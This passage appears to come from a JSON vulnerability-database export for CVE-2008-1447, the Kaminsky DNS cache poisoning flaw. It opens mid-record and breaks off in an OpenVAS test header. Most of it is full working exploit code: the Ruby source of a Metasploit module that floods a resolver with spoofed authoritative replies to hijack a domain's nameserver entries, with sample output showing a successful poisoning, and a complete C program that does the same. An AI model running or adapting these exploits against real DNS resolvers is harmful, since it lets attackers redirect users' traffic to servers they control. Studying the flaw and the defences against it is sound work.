is authoritative for example.com., adding to list of nameservers to spoof as\n[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.\n[*] Querying recon nameserver for address of a.iana-servers.net....\n[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43\n[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....\n[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as\n[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...\n[*] Sent 1000 queries and 20000 spoofed responses...\n[*] Sent 2000 queries and 40000 spoofed responses...\n[*] Sent 3000 queries and 60000 spoofed responses...\n[*] Sent 4000 queries and 80000 spoofed responses...\n[*] Sent 5000 queries and 100000 spoofed responses...\n[*] Sent 6000 queries and 120000 spoofed responses...\n[*] Sent 7000 queries and 140000 spoofed responses...\n[*] Sent 8000 queries and 160000 spoofed responses...\n[*] Sent 9000 queries and 180000 spoofed responses...\n[*] Sent 10000 queries and 200000 spoofed responses...\n[*] Sent 11000 queries and 220000 spoofed responses...\n[*] Sent 12000 queries and 240000 spoofed responses...\n[*] Sent 13000 queries and 260000 spoofed responses...\n[*] Poisoning successful after 13250 attempts: example.com. 
== dns01.metasploit.com\n[*] Auxiliary module execution completed\n\nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D\n[*] exec: dig +short -t ns example.com @A.B.C.D\n\ndns01.metasploit.com.\n\n\nCredits\n=======\n\nDan Kaminsky is credited with originally discovering this vulnerability.\n\nCedric Blancher <sid (@) rstack.org> figured out the NS injection method and \nwas cool enough to email us and share!\n\n\nReferences\n==========\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\nhttp://www.kb.cert.org/vuls/id/800113\n\n\nMetasploit\n==========\n\nrequire 'msf/core'\nrequire 'net/dns'\nrequire 'scruby'\nrequire 'resolv'\n\nmodule Msf\n\nclass Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary\n\n\tinclude Exploit::Remote::Ip\n\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\t\n\t\t\t'Name' => 'DNS BailiWicked Domain Attack',\n\t\t\t'Description' => %q{\n\t\t\t\tThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \n\t\t\t\tDan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target\n\t\t\t\tdomains nameserver entries in a vulnerable DNS cache server. 
This attack works\n\t\t\t\tby sending random hostname queries to the target DNS server coupled with spoofed\n\t\t\t\treplies to those queries from the authoritative nameservers for that domain.\n\t\t\t\tEventually, a guessed ID will match, the spoofed packet will get accepted, and\n\t\t\t\tthe nameserver entries for the target domain will be replaced by the server\n\t\t\t\tspecified in the NEWDNS option of this exploit.\n\t\t\t},\n\t\t\t'Author' => \n\t\t\t\t[ \n\t\t\t\t'\tI)ruid', 'hdm',\n\t\t\t\t\t #\n\t\t\t\t\t'Cedric Blancher <sid[at]rstack.org>' # Cedric figured out the NS injection method \n\t\t\t\t\t # and was cool enough to email us and share!\n\t\t\t\t\t #\n\t\t\t\t],\n\t\t\t'License' => MSF_LICENSE,\n\t\t\t'Version' => '$Revision: 5591 $',\n\t\t\t'References' =>\n\t\t\t\t[\n\t\t\t\t\t[ 'CVE', '2008-1447' ],\n\t\t\t\t\t[ 'US-CERT-VU', '8000113' ],\n\t\t\t\t\t[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ],\n\t\t\t\t],\n\t\t\t'DisclosureDate' => 'Jul 21 2008'\n\t\t\t))\n\t\t\t\n\t\t\tregister_options(\n\t\t\t\t[\n\t\t\t\t\tOptPort.new('SRCPORT', [true, \"The target server's source query port (0 for automatic)\", nil]),\n\t\t\t\t\tOptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']),\n\t\t\t\t\tOptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]),\n\t\t\t\t\tOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']),\n\t\t\t\t\tOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]),\n\t\t\t\t\tOptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]),\n\t\t\t\t], self.class)\n\t\t\t\t\t\n\tend\n\t\n\tdef auxiliary_commands\n\t\treturn { \"check\" => \"Determine if the specified DNS server (RHOST) is vulnerable\" }\n\tend\n\n\tdef cmd_check(*args)\n\t\ttarg = args[0] || rhost()\n\t\tif(not (targ and targ.length > 0))\n\t\t\tprint_status(\"usage: check [dns-server]\")\n\t\t\treturn\n\t\tend\n\n\t\tprint_status(\"Using the Metasploit service 
to verify exploitability...\")\n\t\tsrv_sock = Rex::Socket.create_udp(\n\t\t\t'PeerHost' => targ,\n\t\t\t'PeerPort' => 53\n\t\t)\t\t\n\n\t\trandom = false\n\t\tports = []\n\t\tlport = nil\n\t\t\n\t\t1.upto(5) do |i|\n\t\t\n\t\t\treq = Resolv::DNS::Message.new\n\t\t\ttxt = \"spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\"\n\t\t\treq.add_question(txt, Resolv::DNS::Resource::IN::TXT)\n\t\t\treq.rd = 1\n\t\t\t\n\t\t\tsrv_sock.put(req.encode)\n\t\t\tres, addr = srv_sock.recvfrom()\n\t\t\t\n\n\t\t\tif res and res.length > 0\n\t\t\t\tres = Resolv::DNS::Message.decode(res)\n\t\t\t\tres.each_answer do |name, ttl, data|\n\t\t\t\t\tif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\n\t\t\t\t\t\tt_addr, t_port = $1.split(':')\n\n\t\t\t\t\t\tprint_status(\" >> ADDRESS: #{t_addr} PORT: #{t_port}\")\n\t\t\t\t\t\tt_port = t_port.to_i\n\t\t\t\t\t\tif(lport and lport != t_port)\n\t\t\t\t\t\t\trandom = true\n\t\t\t\t\t\tend\n\t\t\t\t\t\tlport = t_port\n\t\t\t\t\t\tports << t_port\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\t\n\t\tend\n\t\t\n\t\tsrv_sock.close\n\t\t\n\t\tif(ports.length < 5)\n\t\t\tprint_status(\"UNKNOWN: This server did not reply to our vulnerability check requests\")\n\t\t\treturn\n\t\tend\n\t\t\n\t\tif(random)\n\t\t\tprint_status(\"PASS: This server does not use a static source port. 
Ports: #{ports.join(\", \")}\")\n\t\t\tprint_status(\" This server may still be exploitable, but not by this tool.\")\n\t\telse\n\t\t\tprint_status(\"FAIL: This server uses static source ports and is vulnerable to poisoning\")\n\t\tend\n\tend\n\t\t\n\tdef run\n\t\ttarget = rhost()\n\t\tsource = Rex::Socket.source_address(target)\n\t\tsport = datastore['SRCPORT']\n\t\tdomain = datastore['DOMAIN'] + '.'\n\t\tnewdns = datastore['NEWDNS']\n\t\trecons = datastore['RECONS']\n\t\txids = datastore['XIDS'].to_i\n\t\tnewttl = datastore['TTL'].to_i\n\t\txidbase = rand(20001) + 20000\n\t\t\n\t\taddress = Rex::Text.rand_text(4).unpack(\"C4\").join(\".\")\n\n\t\tsrv_sock = Rex::Socket.create_udp(\n\t\t\t'PeerHost' => target,\n\t\t\t'PeerPort' => 53\n\t\t)\n\n\t\t# Get the source port via the metasploit service if it's not set\n\t\tif sport.to_i == 0\n\t\t\treq = Resolv::DNS::Message.new\n\t\t\ttxt = \"spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\"\n\t\t\treq.add_question(txt, Resolv::DNS::Resource::IN::TXT)\n\t\t\treq.rd = 1\n\t\t\t\n\t\t\tsrv_sock.put(req.encode)\n\t\t\tres, addr = srv_sock.recvfrom()\n\t\t\t\n\t\t\tif res and res.length > 0\n\t\t\t\tres = Resolv::DNS::Message.decode(res)\n\t\t\t\tres.each_answer do |name, ttl, data|\n\t\t\t\t\tif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\n\t\t\t\t\t\tt_addr, t_port = $1.split(':')\n\t\t\t\t\t\tsport = t_port.to_i\n\n\t\t\t\t\t\tprint_status(\"Switching to target port #{sport} based on Metasploit service\")\n\t\t\t\t\t\tif target != t_addr\n\t\t\t\t\t\t\tprint_status(\"Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!\")\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\t# Verify its not already poisoned\n\t\tbegin\n\t\t\tquery = Resolv::DNS::Message.new\n\t\t\tquery.add_question(domain, Resolv::DNS::Resource::IN::NS)\n\t\t\tquery.rd = 0\n\n\t\t\tbegin\n\t\t\t\tcached = 
false\n\t\t\t\tsrv_sock.put(query.encode)\n\t\t\t\tanswer, addr = srv_sock.recvfrom()\n\n\t\t\t\tif answer and answer.length > 0\n\t\t\t\t\tanswer = Resolv::DNS::Message.decode(answer)\n\t\t\t\t\tanswer.each_answer do |name, ttl, data|\n\n\t\t\t\t\t\tif((name.to_s + \".\") == domain and data.name.to_s == newdns)\n\t\t\t\t\t\t\tt = Time.now + ttl\n\t\t\t\t\t\t\tprint_status(\"Failure: This domain is already using #{newdns} as a nameserver\")\n\t\t\t\t\t\t\tprint_status(\" Cache entry expires on #{t.to_s}\")\n\t\t\t\t\t\t\tsrv_sock.close\n\t\t\t\t\t\t\tdisconnect_ip\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\t\t\n\t\t\t\tend\n\t\t\tend until not cached\n\t\trescue ::Interrupt\n\t\t\traise $!\n\t\trescue ::Exception => e\n\t\t\tprint_status(\"Error checking the DNS name: #{e.class} #{e} #{e.backtrace}\")\n\t\tend\n\n\n\t\tres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver\n\n\t\tprint_status \"Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}\"\n\n\t\t# Look up the nameservers for the domain\n\t\tprint_status \"Querying recon nameserver for #{domain}'s nameservers...\"\n\t\tanswer0 = res0.send(domain, Net::DNS::NS)\n\t\t#print_status \" Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities\"\n\n\t\tbarbs = [] # storage for nameservers\n\t\tanswer0.answer.each do |rr0|\n\t\t\tprint_status \" Got an #{rr0.type} record: #{rr0.inspect}\"\n\t\t\tif rr0.type == 'NS'\n\t\t\t\tprint_status \" Querying recon nameserver for address of #{rr0.nsdname}...\"\n\t\t\t\tanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname\n\t\t\t\t#print_status \" Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities\"\n\t\t\t\tanswer1.answer.each do |rr1|\n\t\t\t\t\tprint_status \" Got an #{rr1.type} record: #{rr1.inspect}\"\n\t\t\t\t\tres2 = Net::DNS::Resolver.new(:nameservers => 
rr1.address, :dns_search => false, :recursive => false, :retry => 1) \n\t\t\t\t\tprint_status \" Checking Authoritativeness: Querying #{rr1.address} for #{domain}...\"\n\t\t\t\t\tanswer2 = res2.send(domain)\n\t\t\t\t\tif answer2 and answer2.header.auth? and answer2.header.anCount >= 1\n\t\t\t\t\t\tnsrec = {:name => rr0.nsdname, :addr => rr1.address}\n\t\t\t\t\t\tbarbs << nsrec\n\t\t\t\t\t\tprint_status \" #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as\"\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\t\n\t\tend\n\n\t\tif barbs.length == 0\n\t\t\tprint_status( \"No DNS servers found.\")\n\t\t\tsrv_sock.close\n\t\t\tdisconnect_ip\n\t\t\treturn\n\t\tend\n\n\t\t# Flood the target with queries and spoofed responses, one will eventually hit\n\t\tqueries = 0\n\t\tresponses = 0\n\n\t\tconnect_ip if not ip_sock\n\n\t\tprint_status( \"Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...\")\n\n\t\twhile true\n\t\t\trandhost = Rex::Text.rand_text_alphanumeric(12) + '.' 
+ domain # randomize the hostname\n\n\t\t\t# Send spoofed query\n\t\t\treq = Resolv::DNS::Message.new\n\t\t\treq.id = rand(2**16)\n\t\t\treq.add_question(randhost, Resolv::DNS::Resource::IN::A)\n\n\t\t\treq.rd = 1\n\n\t\t\tbuff = (\n\t\t\t\tScruby::IP.new(\n\t\t\t\t\t#:src => barbs[0][:addr].to_s,\n\t\t\t\t\t:src => source,\n\t\t\t\t\t:dst => target,\n\t\t\t\t\t:proto => 17\n\t\t\t\t)/Scruby::UDP.new(\n\t\t\t\t\t:sport => (rand((2**16)-1024)+1024).to_i,\n\t\t\t\t\t:dport => 53\n\t\t\t\t)/req.encode\n\t\t\t).to_net\n\t\t\tip_sock.sendto(buff, target)\n\t\t\tqueries += 1\n\t\t\t\n\t\t\t# Send evil spoofed answer from ALL nameservers (barbs[*][:addr])\n\t\t\treq.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address))\n\t\t\treq.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns)))\n\t\t\treq.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored\n\t\t\treq.qr = 1\n\t\t\treq.aa = 1\n\n\t\t\txidbase.upto(xidbase+xids-1) do |id|\n\t\t\t\treq.id = id\n\t\t\t\tbarbs.each do |barb|\n\t\t\t\t\tbuff = (\n\t\t\t\t\t\tScruby::IP.new(\n\t\t\t\t\t\t\t#:src => barbs[i][:addr].to_s,\n\t\t\t\t\t\t\t:src => barb[:addr].to_s,\n\t\t\t\t\t\t\t:dst => target,\n\t\t\t\t\t\t\t:proto => 17\n\t\t\t\t\t\t)/Scruby::UDP.new(\n\t\t\t\t\t\t\t:sport => 53,\n\t\t\t\t\t\t\t:dport => sport.to_i\n\t\t\t\t\t\t)/req.encode\n\t\t\t\t\t).to_net\n\t\t\t\t\tip_sock.sendto(buff, target)\n\t\t\t\t\tresponses += 1\n\t\t\t\tend\n\t\t\tend\n\n\t\t\t# status update\n\t\t\tif queries % 1000 == 0\n\t\t\t\tprint_status(\"Sent #{queries} queries and #{responses} spoofed responses...\")\n\t\t\tend\n\n\t\t\t# every so often, check and see if the target is poisoned...\n\t\t\tif queries % 250 == 0 \n\t\t\t\tbegin\n\t\t\t\t\tquery = Resolv::DNS::Message.new\n\t\t\t\t\tquery.add_question(domain, Resolv::DNS::Resource::IN::NS)\n\t\t\t\t\tquery.rd = 0\n\t\n\t\t\t\t\tsrv_sock.put(query.encode)\n\t\t\t\t\tanswer, addr = 
srv_sock.recvfrom()\n\n\t\t\t\t\tif answer and answer.length > 0\n\t\t\t\t\t\tanswer = Resolv::DNS::Message.decode(answer)\n\t\t\t\t\t\tanswer.each_answer do |name, ttl, data|\n\t\t\t\t\t\t\tif((name.to_s + \".\") == domain and data.name.to_s == newdns)\n\t\t\t\t\t\t\t\tprint_status(\"Poisoning successful after #{queries} attempts: #{domain} == #{newdns}\")\n\t\t\t\t\t\t\t\tsrv_sock.close\n\t\t\t\t\t\t\t\tdisconnect_ip\n\t\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\trescue ::Interrupt\n\t\t\t\t\traise $!\n\t\t\t\trescue ::Exception => e\n\t\t\t\t\tprint_status(\"Error querying the DNS name: #{e.class} #{e} #{e.backtrace}\")\n\t\t\t\tend\n\t\t\tend\n\n\t\tend\n\n\tend\n\nend\nend\t\n\n# milw0rm.com [2008-07-23]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-04-01T19:04:05", "description": "\nBIND 9.x - Remote DNS Cache Poisoning", "edition": 1, "published": "2008-07-25T00:00:00", "title": "BIND 9.x - Remote DNS Cache Poisoning", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-25T00:00:00", "id": "EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D", "href": "", "sourceData": "/*\n * Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack\n *\n * Compilation:\n * $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm\n *\n * Dependency: libdnet (aka libdumbnet-dev under Ubuntu)\n *\n * Author: marc.bevand at rapid7 dot com\n */\n\n#define _BSD_SOURCE\n\n#include <sys/types.h>\n#include <err.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <math.h>\n#include <time.h>\n#include <unistd.h>\n#include <dumbnet.h>\n\n#define DNSF_RESPONSE (1<<15)\n#define DNSF_AUTHORITATIVE (1<<10)\n#define DNSF_REC_DESIRED (1<<8)\n#define DNSF_REC_AVAILABLE (1<<7)\n\n#define TYPE_A 0x1\n#define TYPE_NS 0x2\n#define CLASS_IN 0x1\n\nstruct dns_pkt\n{\n uint16_t txid;\n uint16_t flags;\n uint16_t nr_quest;\n uint16_t 
nr_ans;\n uint16_t nr_auth;\n uint16_t nr_add;\n} __attribute__ ((__packed__));\n\nvoid format_domain(u_char *buf, unsigned size, unsigned *len, const char *name)\n{\n unsigned bufi, i, j;\n bufi = i = j = 0;\n while (name[i])\n {\n if (name[i] == '.')\n {\n if (bufi + 1 + (i - j) > size)\n fprintf(stderr, \"format_domain overflow\\n\"), exit(1);\n buf[bufi++] = i - j;\n memcpy(buf + bufi, name + j, i - j);\n bufi += i - j;\n j = i + 1;\n }\n i++;\n }\n if (bufi + 1 + 2 + 2 > size)\n fprintf(stderr, \"format_domain overflow\\n\"), exit(1);\n buf[bufi++] = 0;\n *len = bufi;\n}\n\nvoid format_qr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class)\n{\n uint16_t tmp;\n // name\n format_domain(buf, size, len, name);\n // type\n tmp = htons(type);\n memcpy(buf + *len, &tmp, sizeof (tmp));\n *len += sizeof (tmp);\n // class\n tmp = htons(class);\n memcpy(buf + *len, &tmp, sizeof (tmp));\n *len += sizeof (tmp);\n}\n\nvoid format_rr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class, uint32_t ttl, const char *data)\n{\n format_qr(buf, size, len, name, type, class);\n // ttl\n ttl = htonl(ttl);\n memcpy(buf + *len, &ttl, sizeof (ttl));\n *len += sizeof (ttl);\n // data length + data\n uint16_t dlen;\n struct addr addr;\n switch (type)\n {\n case TYPE_A:\n dlen = sizeof (addr.addr_ip);\n break;\n case TYPE_NS:\n dlen = strlen(data) + 1;\n break;\n default:\n fprintf(stderr, \"format_rr: unknown type %02x\", type);\n exit(1);\n }\n dlen = htons(dlen);\n memcpy(buf + *len, &dlen, sizeof (dlen));\n *len += sizeof (dlen);\n // data\n unsigned len2;\n switch (type)\n {\n case TYPE_A:\n if (addr_aton(data, &addr) < 0)\n fprintf(stderr, \"invalid destination IP: %s\", data), exit(1);\n memcpy(buf + *len, &addr.addr_ip, sizeof (addr.addr_ip));\n *len += sizeof (addr.addr_ip);\n break;\n case TYPE_NS:\n format_domain(buf + *len, size - *len, &len2, data);\n *len += len2;\n break;\n default:\n 
fprintf(stderr, \"format_rr: unknown type %02x\", type);\n exit(1);\n }\n}\n\nvoid dns_query(u_char *buf, unsigned size, unsigned *len, uint16_t txid, uint16_t flags, const char *name)\n{\n u_char *out = buf;\n struct dns_pkt p = {\n .txid = htons(txid),\n .flags = htons(flags),\n .nr_quest = htons(1),\n .nr_ans = htons(0),\n .nr_auth = htons(0),\n .nr_add = htons(0),\n };\n u_char qr[256];\n unsigned l;\n format_qr(qr, sizeof (qr), &l, name, TYPE_A, CLASS_IN);\n if (sizeof (p) + l > size)\n fprintf(stderr, \"dns_query overflow\"), exit(1);\n memcpy(out, &p, sizeof (p));\n out += sizeof (p);\n memcpy(out, qr, l);\n out += l;\n *len = sizeof (p) + l;\n}\n\nvoid dns_response(u_char *buf, unsigned size, unsigned *len,\n uint16_t txid, uint16_t flags,\n const char *q_name, const char *q_ip,\n const char *domain, const char *auth_name, const char *auth_ip)\n{\n u_char *out = buf;\n u_char *end = buf + size;\n u_char rec[256];\n unsigned l_rec;\n uint32_t ttl = 24*3600;\n struct dns_pkt p = {\n .txid = htons(txid),\n .flags = htons(flags),\n .nr_quest = htons(1),\n .nr_ans = htons(1),\n .nr_auth = htons(1),\n .nr_add = htons(1),\n };\n (void)domain;\n *len = 0;\n if (out + *len + sizeof (p) > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, &p, sizeof (p)); *len += sizeof (p);\n // queries\n format_qr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n // answers\n format_rr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN,\n ttl, q_ip);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n // authoritative nameservers\n format_rr(rec, sizeof (rec), &l_rec, domain, TYPE_NS, CLASS_IN,\n ttl, auth_name);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, 
l_rec); *len += l_rec;\n // additional records\n format_rr(rec, sizeof (rec), &l_rec, auth_name, TYPE_A, CLASS_IN,\n ttl, auth_ip);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n}\n\nunsigned build_query(u_char *buf, const char *srcip, const char *dstip, const char *name)\n{\n unsigned len = 0;\n // ip\n struct ip_hdr *ip = (struct ip_hdr *)buf;\n ip->ip_hl = 5;\n ip->ip_v = 4;\n ip->ip_tos = 0;\n ip->ip_id = rand() & 0xffff;\n ip->ip_off = 0;\n ip->ip_ttl = IP_TTL_MAX;\n ip->ip_p = 17; // udp\n ip->ip_sum = 0;\n struct addr addr;\n if (addr_aton(srcip, &addr) < 0)\n fprintf(stderr, \"invalid source IP: %s\", srcip), exit(1);\n ip->ip_src = addr.addr_ip;\n if (addr_aton(dstip, &addr) < 0)\n fprintf(stderr, \"invalid destination IP: %s\", dstip), exit(1);\n ip->ip_dst = addr.addr_ip;\n // udp\n struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN);\n udp->uh_sport = htons(1234);\n udp->uh_dport = htons(53);\n // dns\n dns_query(buf + IP_HDR_LEN + UDP_HDR_LEN,\n (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len,\n rand(), DNSF_REC_DESIRED, name);\n // udp len\n len += UDP_HDR_LEN;\n udp->uh_ulen = htons(len);\n // ip len & cksum\n len += IP_HDR_LEN;\n ip->ip_len = htons(len);\n ip_checksum(buf, len);\n return len;\n}\n\nunsigned build_response(u_char *buf, const char *srcip, const char *dstip,\n uint16_t port_resolver, uint16_t txid,\n const char *q_name, const char *q_ip,\n const char *domain, const char *auth_name, const char *auth_ip)\n{\n unsigned len = 0;\n // ip\n struct ip_hdr *ip = (struct ip_hdr *)buf;\n ip->ip_hl = 5;\n ip->ip_v = 4;\n ip->ip_tos = 0;\n ip->ip_id = rand() & 0xffff;\n ip->ip_off = 0;\n ip->ip_ttl = IP_TTL_MAX;\n ip->ip_p = 17; // udp\n ip->ip_sum = 0;\n struct addr addr;\n if (addr_aton(srcip, &addr) < 0)\n fprintf(stderr, \"invalid source IP: %s\", srcip), exit(1);\n ip->ip_src = addr.addr_ip;\n if (addr_aton(dstip, &addr) < 0)\n 
fprintf(stderr, \"invalid destination IP: %s\", dstip), exit(1);\n ip->ip_dst = addr.addr_ip;\n // udp\n struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN);\n udp->uh_sport = htons(53);\n udp->uh_dport = htons(port_resolver);\n // dns\n dns_response(buf + IP_HDR_LEN + UDP_HDR_LEN,\n (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len,\n txid, DNSF_RESPONSE | DNSF_AUTHORITATIVE,\n q_name, q_ip, domain, auth_name, auth_ip);\n // udp len\n len += UDP_HDR_LEN;\n udp->uh_ulen = htons(len);\n // ip len & cksum\n len += IP_HDR_LEN;\n ip->ip_len = htons(len);\n ip_checksum(buf, len);\n return len;\n}\n\nvoid usage(char *name)\n{\n fprintf(stderr, \"Usage: %s <ip-querier> <ip-resolver> <ip-authoritative> \"\n \"<port-resolver> <subhost> <domain> <any-ip> <attempts> <repl-per-attempt>\\n\"\n \" <ip-querier> Source IP used when sending queries for random hostnames\\n\"\n \" (typically your IP)\\n\"\n \" <ip-resolver> Target DNS resolver to attack\\n\"\n \" <ip-authoritative> One of the authoritative DNS servers for <domain>\\n\"\n \" <port-resolver> Source port used by the resolver when forwarding queries\\n\"\n \" <subhost> Poison the cache with the A record <subhost>.<domain>\\n\"\n \" <domain> Domain name, see <subhost>.\\n\"\n \" <any-ip> IP of your choice to be associated to <subhost>.<domain>\\n\"\n \" <attempts> Number of poisoning attemps, more attempts increase the\\n\"\n \" chance of successful poisoning, but also the attack time\\n\"\n \" <repl-per-attempt> Number of spoofed replies to send per attempt, more replies\\n\"\n \" increase the chance of successful poisoning but, but also\\n\"\n \" the rate of packet loss\\n\"\n \"Example:\\n\"\n \" $ %s q.q.q.q r.r.r.r a.a.a.a 1234 pwned example.com. 1.1.1.1 8192 16\\n\"\n \"This should cause a pwned.example.com A record resolving to 1.1.1.1 to appear\\n\"\n \"in r.r.r.r's cache. 
The chance of successfully poisoning the resolver with\\n\"\n \"this example (8192 attempts and 16 replies/attempt) is 86%%\\n\"\n \"(1-(1-16/65536)**8192). This example also requires a bandwidth of about\\n\"\n \"2.6 Mbit/s (16 replies/attempt * ~200 bytes/reply * 100 attempts/sec *\\n\"\n \"8 bits/byte) and takes about 80 secs to complete (8192 attempts /\\n\"\n \"100 attempts/sec).\\n\",\n name, name);\n}\n\nint main(int argc, char **argv)\n{\n if (argc != 10)\n usage(argv[0]), exit(1);\n const char *querier = argv[1];\n const char *ip_resolver = argv[2];\n const char *ip_authoritative = argv[3];\n uint16_t port_resolver = (uint16_t)strtoul(argv[4], NULL, 0);\n const char *subhost = argv[5];\n const char *domain = argv[6];\n const char *anyip = argv[7];\n uint16_t attempts = (uint16_t)strtoul(argv[8], NULL, 0);\n uint16_t replies = (uint16_t)strtoul(argv[9], NULL, 0);\n if (domain[strlen(domain) - 1 ] != '.')\n fprintf(stderr, \"domain must end with dot(.): %s\\n\", domain), exit(1);\n printf(\"Chance of success: 1-(1-%d/65536)**%d = %.2f\\n\", replies, attempts, 1 - pow((1 - replies / 65536.), attempts));\n srand(time(NULL));\n int unique = rand() + (rand() << 16);\n u_char buf[IP_LEN_MAX];\n unsigned len;\n char name[256];\n char ns[256];\n ip_t *iph;\n if ((iph = ip_open()) == NULL)\n err(1, \"ip_open\");\n int cnt = 0;\n while (cnt < attempts)\n {\n // send a query for a random hostname\n snprintf(name, sizeof (name), \"%08x%08x.%s\", unique, cnt, domain);\n len = build_query(buf, querier, ip_resolver, name);\n if (ip_send(iph, buf, len) != len)\n err(1, \"ip_send\");\n // give the resolver enough time to forward the query and be in a state\n // where it waits for answers; sleeping 10ms here limits the number of\n // attempts to 100 per sec\n usleep(10000);\n // send spoofed replies, each reply contains:\n // - 1 query: query for the \"random hostname\"\n // - 1 answer: \"random hostname\" A 1.1.1.1\n // - 1 authoritative nameserver: <domain> NS 
<subhost>.<domain>\n // - 1 additional record: <subhost>.<domain> A <any-ip>\n snprintf(ns, sizeof (ns), \"%s.%s\", subhost, domain);\n unsigned r;\n for (r = 0; r < replies; r++)\n {\n // use a txid that is just 'r': 0..(replies-1)\n len = build_response(buf, ip_authoritative, ip_resolver,\n port_resolver, r, name, \"1.1.1.1\", domain, ns, anyip);\n if (ip_send(iph, buf, len) != len)\n err(1, \"ip_send\");\n }\n cnt++;\n }\n ip_close(iph);\n return 0;\n}\n\n// milw0rm.com [2008-07-25]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2017-07-24T12:51:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2008-191-02.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:61464", "href": "http://plugins.openvas.org/nasl.php?oid=61464", "type": "openvas", "title": "Slackware Advisory SSA:2008-191-02 bind", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2008_191_02.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
